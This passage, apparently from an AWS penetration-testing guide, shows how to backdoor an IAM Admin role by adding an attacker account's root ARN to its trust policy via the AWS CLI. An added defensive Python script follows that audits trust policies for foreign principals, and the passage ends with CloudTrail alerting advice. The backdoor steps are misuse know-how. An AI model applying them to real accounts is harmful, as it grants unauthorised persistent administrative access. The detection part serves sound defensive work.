Adding our backdoor access

We are now going to add our attacker-owned account as a trust policy to this role. First, we will save the value of the AssumeRolePolicyDocument key in the role's trust policy to a local JSON file (trust-policy.json). To add trust to our own account without removing the current trust, we can turn the value of the Principal AWS key from a string to an array. This array will include the root ARN that is already in place and the root ARN of our attacker account. trust-policy.json should now look like the following:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": {
                "AWS": [
                    "arn:aws:iam::111111111111:root",
                    "arn:aws:iam::012345678912:root"
                ]
            },
            "Action": "sts:AssumeRole"
        }
    ]
}

Next, we will update the role with this trust policy using the AWS CLI:

aws iam update-assume-role-policy --role-name Admin --policy-document file://trust-policy.json --profile Test 

If the update succeeded, the AWS CLI returns no output to the console. Otherwise, you will see an error and a short description of what went wrong. To confirm that everything went correctly, we can use the AWS CLI to get the role and view the trust policy document again:

aws iam get-role --role-name Admin --profile Test 

The response from that command should include the trust policy you just uploaded.

The only other thing we will need to do is to save the role's ARN somewhere locally, so that we don't forget it. In this example, the ARN of our target role was arn:aws:iam::111111111111:role/Admin. Now everything is done.
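From the defender's side, the change described above is exactly what a trust-policy audit should catch: a role in one account whose AssumeRolePolicyDocument now names a principal from a different account. The following script is an added example and not code from the book; it parses a trust policy offline and lists every principal that can call sts:AssumeRole and does not belong to the account that owns the role. The two sample policies are constructed (the "before" form with a single string principal is inferred from the text; the "after" form is the trust-policy.json shown on the page), the account IDs 111111111111 and 012345678912 are the page's, and the function names are my own.

```python
"""Offline audit of an IAM role trust policy: which principals may assume the
role from outside the account that owns it? Example code, not from the book."""
import json
import re
from fnmatch import fnmatchcase
from typing import Any, List, Optional

# Constructed sample 1: Principal.AWS is a single string, trusting only the
# role's own account (111111111111). This is the shape the text describes
# before the change.
ORIGINAL_TRUST_POLICY_JSON = """
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {"AWS": "arn:aws:iam::111111111111:root"},
      "Action": "sts:AssumeRole"
    }
  ]
}
"""

# Constructed sample 2: Principal.AWS turned into an array with a second
# account's root ARN appended (the trust-policy.json shown on the page).
MODIFIED_TRUST_POLICY_JSON = """
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "AWS": [
          "arn:aws:iam::111111111111:root",
          "arn:aws:iam::012345678912:root"
        ]
      },
      "Action": "sts:AssumeRole"
    }
  ]
}
"""

# Captures the account-ID field of an IAM ARN: arn:aws:iam::ACCOUNT:...
# (also matches partitions such as aws-cn / aws-us-gov).
_ARN_ACCOUNT = re.compile(r"^arn:aws[a-z-]*:iam::(\d{12}):")


def principal_account(principal: str) -> Optional[str]:
    """Return the 12-digit account ID a principal string refers to, or None if
    it cannot be tied to a single account ('*' or an unrecognised form)."""
    if re.fullmatch(r"\d{12}", principal):
        return principal  # a bare account ID is shorthand for that account's root
    m = _ARN_ACCOUNT.match(principal)
    return m.group(1) if m else None


def _as_list(value: Any) -> list:
    """IAM lets most policy fields be a scalar or a list; normalise to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _grants_assume_role(statement: dict) -> bool:
    """True for an Allow statement whose Action covers sts:AssumeRole,
    including glob-style wildcards such as sts:* or *."""
    if statement.get("Effect") != "Allow":
        return False
    return any(fnmatchcase("sts:assumerole", a.lower())
               for a in _as_list(statement.get("Action")))


def foreign_principals(policy: dict, home_account: str) -> List[str]:
    """Every AWS principal allowed to assume the role that is not in
    home_account. '*' and unparseable principals are reported too, since they
    cannot be shown to belong to the home account."""
    findings: List[str] = []
    for stmt in _as_list(policy.get("Statement")):
        if not _grants_assume_role(stmt):
            continue
        principal = stmt.get("Principal", {})
        if principal == "*":
            findings.append("*")
            continue
        for p in _as_list(principal.get("AWS")):
            if principal_account(p) != home_account:
                findings.append(p)
    return findings


def audit_trust_policy(policy_json: str, home_account: str) -> List[str]:
    """Parse a trust policy document and return its foreign principals."""
    return foreign_principals(json.loads(policy_json), home_account)


if __name__ == "__main__":
    for label, doc in (("before", ORIGINAL_TRUST_POLICY_JSON),
                       ("after", MODIFIED_TRUST_POLICY_JSON)):
        print(label, audit_trust_policy(doc, "111111111111"))
```

In practice the document to audit is the AssumeRolePolicyDocument field in the output of aws iam get-role (the same command the text uses to verify the upload); running the check across every role in an account turns a one-line trust-policy edit into a reviewable finding. The modifying call itself is recorded by CloudTrail as an UpdateAssumeRolePolicy event, so alerting on that event name for privileged roles catches the change at the moment it is made rather than at the next audit.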
